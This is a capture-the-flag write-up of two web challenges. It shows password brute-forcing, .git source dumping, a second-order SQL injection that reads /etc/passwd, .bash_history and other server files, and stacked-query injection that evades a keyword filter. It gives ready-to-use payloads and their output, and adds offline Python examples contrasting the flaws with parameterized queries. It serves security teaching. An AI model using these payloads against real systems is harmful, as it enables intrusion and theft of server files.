http://47.102.141.139:8307

First, a dirbuster scan finds login.php and a .git directory.
Go to login.php first: it tells you the username is zhangwei, and the password can be brute-forced with Burp Suite's Intruder module.
Submit any password with Sign in and capture the request.


Send the request to Intruder and mark the password parameter under Positions.

Then under Payloads choose the brute-force mode, load a wordlist containing digits, upper- and lower-case letters and symbols, and Start attack.

It runs slowly because the wordlist is large; since there is no hint about what the three extra characters are, everything has to be tried. It finally comes out as zhangwei666.
After logging in you can post normally: a post has title, category and content, and the detail page has another content field.
Opening the browser console gives a surprise: "the programmer wrote half the Git and ran off, never even got to commit :)".
GitHack recovers half of write_do.php:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            break;
        case 'comment':
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>

The Dumper and Extractor from GitTools recover the full source:

root@Damyayayayaya:/home/GitTools-master/Dumper# bash gitdumper.sh http://47.102.141.139:8307/.git/ write
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[+] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/bf/bdf218902476c5c6164beedd8d2fcf593ea23b
[+] Downloaded: objects/e5/b2a2443c2b6d395d06960123142bc91123148c
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/2a/d429743f51d38f0d2cf9540ba22720cc6b2f2b
[+] Downloaded: objects/76/9905f5a6f425ce62ed9a1cbf375a61fb56b406
[+] Downloaded: objects/55/56e3ad3f21a0cf5938e26985a04ce3aa73faaf
[+] Downloaded: objects/56/dfc20e665f434b97f34ff4dc85782ae93cf1a4
[+] Downloaded: objects/8e/f569f235780f24c42b60f50d528a03f7238c80

root@Damyayayayaya:/home/GitTools-master/Extractor# ./extractor.sh ../Dumper/write/ ../Dumper/write/
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: bfbdf218902476c5c6164beedd8d2fcf593ea23b
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//0-bfbdf218902476c5c6164beedd8d2fcf593ea23b/write_do.php
[+] Found commit: e5b2a2443c2b6d395d06960123142bc91123148c
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//1-e5b2a2443c2b6d395d06960123142bc91123148c/write_do.php
[+] Found commit: 5556e3ad3f21a0cf5938e26985a04ce3aa73faaf
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//2-5556e3ad3f21a0cf5938e26985a04ce3aa73faaf/write_do.php

root@Damyayayayaya:/home/GitTools-master/Dumper/write/1-e5b2a2443c2b6d395d06960123142bc91123148c# cat write_do.php

Here is the source; time to audit it.

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                    set category = '$category',
                        title = '$title',
                        content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                $sql = "insert into comment
                        set category = '$category',
                            content = '$content',
                            bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>

This challenge POSTs three variables: title, category and content on the post page, and content on the detail page. The idea is that the two content submissions work together: the first closes the quoted string and comments out the rest of the statement, and the second closes that comment so the stored fragment runs inside the database query (a second-order injection). Note that the category from the post page is the field that really matters: in the comment branch it is read back from board and spliced into the insert without addslashes, so the query has to be written there.
The statement is easy to construct, for example
', content=(select load_file('//etc/passwd')),/*
Then, when leaving a comment, you only need to close the comment and the stored content statement executes:
', content=(select load_file('//etc/passwd')),/**/#
This returns every user on the system and their basic information:

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
www:x:500:500:www:/home/www:/bin/bash
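
The second-order injection described above, as an added example that is not part of the original write-up: a Python/sqlite3 stand-in for write_do.php that runs offline. The escaping, table layout and payload are adapted to SQLite (quote doubling instead of addslashes(), INSERT ... VALUES instead of MySQL's INSERT ... SET, a `--` comment instead of `/* ... */#`); the `secret` table, the function names and the payload are assumptions. The point it makes is that escaping on the way in does not protect the stored value on the way out, and that binding the value on the second hop does.

```python
import sqlite3

# Added example: a Python/sqlite3 stand-in for the leaked write_do.php.
# board/comment mirror the PHP; `secret` is an assumed stand-in for whatever
# load_file() or another table would expose.


def escape(s: str) -> str:
    """Quote-doubling escape, the ANSI/SQLite counterpart of PHP's addslashes().
    The database removes the escaping when it parses the literal, so what is
    stored is the original, unescaped string."""
    return s.replace("'", "''")


def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE board   (id INTEGER PRIMARY KEY, category TEXT, title TEXT, content TEXT);
        CREATE TABLE comment (id INTEGER PRIMARY KEY, category TEXT, content TEXT, bo_id INTEGER);
        CREATE TABLE secret  (v TEXT);
        INSERT INTO secret VALUES ('constructed-secret');
    """)
    return db


# --- vulnerable shape: escape on insert, then trust the stored value --------

def write_post_vulnerable(db, category, title, content) -> int:
    sql = ("INSERT INTO board (category, title, content) VALUES ('%s', '%s', '%s')"
           % (escape(category), escape(title), escape(content)))
    return db.execute(sql).lastrowid


def comment_vulnerable(db, bo_id, content):
    # category comes back from the DB exactly as the poster typed it and is
    # spliced into the next statement unescaped: the second-order injection.
    category = db.execute("SELECT category FROM board WHERE id=?", (bo_id,)).fetchone()[0]
    sql = ("INSERT INTO comment (category, content, bo_id) VALUES ('%s', '%s', %d)"
           % (category, escape(content), bo_id))
    db.execute(sql)
    return db.execute("SELECT category, content FROM comment ORDER BY id DESC LIMIT 1").fetchone()


# --- hardened shape: bind every value on both hops --------------------------

def write_post_hardened(db, category, title, content) -> int:
    return db.execute("INSERT INTO board (category, title, content) VALUES (?, ?, ?)",
                      (category, title, content)).lastrowid


def comment_hardened(db, bo_id, content):
    # The stored string is identical to the vulnerable case; the difference is
    # that it is passed as data, so it can never become part of the statement.
    category = db.execute("SELECT category FROM board WHERE id=?", (bo_id,)).fetchone()[0]
    db.execute("INSERT INTO comment (category, content, bo_id) VALUES (?, ?, ?)",
               (category, content, bo_id))
    return db.execute("SELECT category, content FROM comment ORDER BY id DESC LIMIT 1").fetchone()


# Constructed payload: closes the category literal, supplies the remaining two
# columns itself and comments out the rest of the statement.
PAYLOAD = "x', (SELECT v FROM secret), 1) -- "


def demo():
    db = setup()
    bo = write_post_vulnerable(db, PAYLOAD, "title", "body")
    stored = db.execute("SELECT category FROM board WHERE id=?", (bo,)).fetchone()[0]
    leaked = comment_vulnerable(db, bo, "harmless comment")

    db2 = setup()
    bo2 = write_post_hardened(db2, PAYLOAD, "title", "body")
    safe = comment_hardened(db2, bo2, "harmless comment")
    return stored, leaked, safe


if __name__ == "__main__":
    print(demo())
```

Running it shows the escaped insert storing the payload intact, the vulnerable comment path writing the secret into the comment's content column, and the parameterized path storing the payload string itself as the category and the user's comment as the content.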

All those pseudo-users are nologin; only the last one, www, looks like a real account, so read its command history:
', content=(select load_file('//home/www/.bash_history')),/**/#

cd /tmp/ unzip html.zip 
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start

Before starting the web server he went to /tmp/, unzipped html.zip, deleted the archive, copied html to /var/www/ (cp -r, so the copy under /tmp/ stays behind) and only then deleted .DS_Store. In other words the .DS_Store file under /tmp/ is still there, so keep reading files (without hex() the output comes back as garbage):

',content=(select hex(load_file('//tmp/html/.DS_Store'))),/**/#

This returns a long hex string; paste it into Notepad and convert it to ASCII to get a file name, flag_8946e1ff1ee3e40f.php.
Read that file the same way as before:
',content=(select hex(load_file('//var/www/html/flag_8946e1ff1ee3e40f.php'))),/**/#
Convert it in Notepad again and the flag comes out:

<?php
$flag="flag{wdb2018_truncation_sql_inject}";
?>
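
The hex-to-ASCII step above, as an added Python example that is not from the write-up: it turns the hex string that hex(load_file(...)) returns back into bytes and pulls the UTF-16BE record names out of a .DS_Store file, which is what the manual Notepad conversion was doing by eye. The sample file is constructed (a Bud1 header plus length-prefixed UTF-16BE names and filler), not a real Finder file, and the matching is a heuristic for UTF-16BE runs rather than a full parser of the file's B-tree.

```python
import binascii
import re

# Added example: decode the hex dump of a .DS_Store and list the filenames it
# records. The sample file below is constructed, not a real Finder file.


def decode_hex_dump(hex_text: str) -> bytes:
    """MySQL's hex() emits one unbroken upper-case string; tolerate the
    whitespace and line breaks picked up while copying it out of a page."""
    return binascii.unhexlify("".join(hex_text.split()))


# Finder stores each record's filename as UTF-16BE. A run of at least four
# NUL-plus-printable-ASCII pairs is a cheap heuristic for one; it is not a
# parser of the .DS_Store B-tree structure.
UTF16BE_RUN = re.compile(rb"(?:\x00[\x20-\x7e]){4,}")


def extract_names(blob: bytes) -> list:
    return [m.group(0).decode("utf-16-be") for m in UTF16BE_RUN.finditer(blob)]


def names_from_hex(hex_text: str) -> list:
    return extract_names(decode_hex_dump(hex_text))


def build_sample_ds_store() -> bytes:
    """Constructed stand-in for the dumped file: a Bud1 header, then records laid
    out as <u32 name length><UTF-16BE name><4-byte id><4-byte type><filler>,
    with the page's flag filename among them."""
    names = ["index.php", "login.php", "flag_8946e1ff1ee3e40f.php"]
    blob = b"\x00\x00\x00\x01Bud1" + b"\x00" * 16
    for name in names:
        blob += len(name).to_bytes(4, "big") + name.encode("utf-16-be")
        blob += b"Iloc" + b"blob" + b"\x00\x00\x00\x10" + bytes(range(16))
    return blob


# What the injected hex(load_file()) would have returned for the sample file.
SAMPLE_HEX = build_sample_ds_store().hex().upper()


if __name__ == "__main__":
    print(names_from_hex(SAMPLE_HEX))
```

On a real dump the same call lists every name Finder has recorded for the directory, which is why a stray .DS_Store in a web root leaks file names that directory scanning would otherwise have to guess.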

http://47.102.141.139:8302

First check the page source: nothing there. After submitting, a PHP array is printed, which suggests crafting a MySQL statement that errors so the database can be queried.
select databases → error:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

Many of the keywords used to query the database are filtered, and the regex's /i makes it case-insensitive. First thought: show is not restricted, so use show to list the databases.
http://47.102.141.139:8302/?inject=1';show databases;#
The '; closes the preceding part and # comments out the rest, and the database names come back:

array(1) {
[0]=>
string(11) "ctftraining"
}

array(1) {
[0]=>
string(18) "information_schema"
}

array(1) {
[0]=>
string(5) "mysql"
}

array(1) {
[0]=>
string(18) "performance_schema"
}

array(1) {
[0]=>
string(9) "supersqli"
}

array(1) {
[0]=>
string(4) "test"
}

Next, list the tables in the supersqli database; a string of digits shows up as a table name:
http://47.102.141.139:8302/?inject=1';show tables from supersqli;#

array(1) {
[0]=>
string(16) "1919810931114514"
}

array(1) {
[0]=>
string(5) "words"
}

Trying show to list the column names gives no output, so there are three options: one, a prepared-statement select to read the flag; two, alter to rename the tables so the flag is read directly; three, splitting the filtered keyword so select gets past the filter.
I used the third because it is the simplest and I had used it before: concatenate the SQL to execute (it can also be done statement by statement) so the filtered keywords are split and evade the check.

http://47.102.141.139:8302/?inject=1';use information_schema;set @sql=concat('s','elect column_name from columns wher','e table_name="1919810931114514"');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

Running this shows that the 1919810931114514 table has a flag column:

array(1) {
[0]=>
string(4) "flag"
}

Build the payload directly on top of the previous statement:
http://47.102.141.139:8302/?inject=1';use supersqli;set @sql=concat('s','elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+
(With a prepared statement, if the queried content does not exist, an error is raised.)
This gives the flag:

array(1) {
[0]=>
string(32) "flag{glzjin_wants_a_girl_firend}"
}

I also reproduced the other two methods following other people's write-ups.

  • Prepared-statement select to read the flag
set @sql=concat('sel','ect * from `1919810931114514`');prepare presql from @sql;execute presql;deallocate prepare presql;
// hint: strstr($inject, "set") && strstr($inject, "prepare")
// strstr is used to match the keywords, so simply changing the case of the keywords bypasses it

payload: http://47.102.141.139:8302/?inject=1'%3bSet+%40sqll%3dconcat('sel','ect+*+from+`1919810931114514`')%3bPrepare+presql+from+%40sqll%3bexecute+presql%3bdeallocate+Prepare+presql%3b%23

  • alter to rename the table and read the flag directly

First add the id column: http://47.102.141.139:8302/?inject=1';alter+table+`1919810931114514`+rename+to+`damya`;alter+table+`words`+rename+to+`damya3`;alter+table+`damya`+rename+to+`words`;%23
payload: http://47.102.141.139:8302/?inject=1';ALTER TABLE 1919810931114514 ADD id INT(1) NOT NULL DEFAULT ‘1’ AFTER flag;%23
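
To close the second challenge from the defensive side, an added Python example that is not from the page or the challenge's source: it reproduces the page's blocklist regex, shows that the show, split-keyword and rename payloads all pass it, and contrasts a string-built query run through an API that executes every statement in the string (the shape that makes stacked queries possible) with a single parameterized statement. The query shape `select * from words where id='$inject'` is an assumption, since the page never shows it; the tables, the flag value and the payload strings are constructed. The MySQL-only payloads (show, prepare) cannot execute in SQLite, so only the rename payload is run end to end.

```python
import re
import sqlite3

# Added example (not the challenge's source): the page's blocklist next to the
# two query styles it was meant to protect.
BLOCKLIST = re.compile(r"select|update|delete|drop|insert|where|\.", re.IGNORECASE)

# Constructed payloads in the style of the page. show/prepare are MySQL-only
# and will not execute in SQLite, but the filter check does not care.
PAYLOADS = {
    "show":   "1';show databases;#",
    "split":  "1';set @sql=concat('s','elect flag from 1919810931114514');"
              "prepare s from @sql;execute s;--",
    "rename": "1';alter table words rename to words_old;"
              "alter table `1919810931114514` rename to words;--",
}


def blocklist_allows(inject: str) -> bool:
    """True when the input gets past the regex and reaches the query."""
    return BLOCKLIST.search(inject) is None


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE words (id INTEGER, word TEXT);
        INSERT INTO words VALUES (1, 'hello');
        CREATE TABLE `1919810931114514` (flag TEXT);
        INSERT INTO `1919810931114514` VALUES ('constructed-flag');
    """)
    return db


def words_columns(db) -> list:
    """Column names of whatever table is currently called `words`."""
    return [row[1] for row in db.execute("PRAGMA table_info(words)")]


def vulnerable_lookup(db, inject: str):
    """Assumed shape of the challenge's query: string-built and run through an
    API that executes every statement in the string (as mysqli_multi_query
    would). The blocklist is the only thing standing in the way."""
    if not blocklist_allows(inject):
        return "blocked"
    db.executescript("select * from words where id='%s'" % inject)
    return [row[0] for row in db.execute("select * from words")]


def hardened_lookup(db, inject: str):
    """The same lookup with the value bound: one statement, and the input is
    data only, so no blocklist is needed and none could be bypassed."""
    return [row[0] for row in db.execute("select word from words where id=?", (inject,))]


if __name__ == "__main__":
    for name, p in PAYLOADS.items():
        print(name, "passes filter:", blocklist_allows(p))
    db = fresh_db()
    print("vulnerable:", vulnerable_lookup(db, PAYLOADS["rename"]), words_columns(db))
    db = fresh_db()
    print("hardened:  ", hardened_lookup(db, PAYLOADS["rename"]), words_columns(db))
```

The blocklist is case-insensitive yet passes all three payloads because none of them contains a filtered token as a contiguous string. On the stacked-statement path the rename payload swaps the tables, so the application's own `select * from words` returns the flag afterwards; on the bound path the same string simply fails to match any id and the schema is untouched. The practical lesson is that keyword filtering and multi-statement execution are the two things to remove, not the two things to tune.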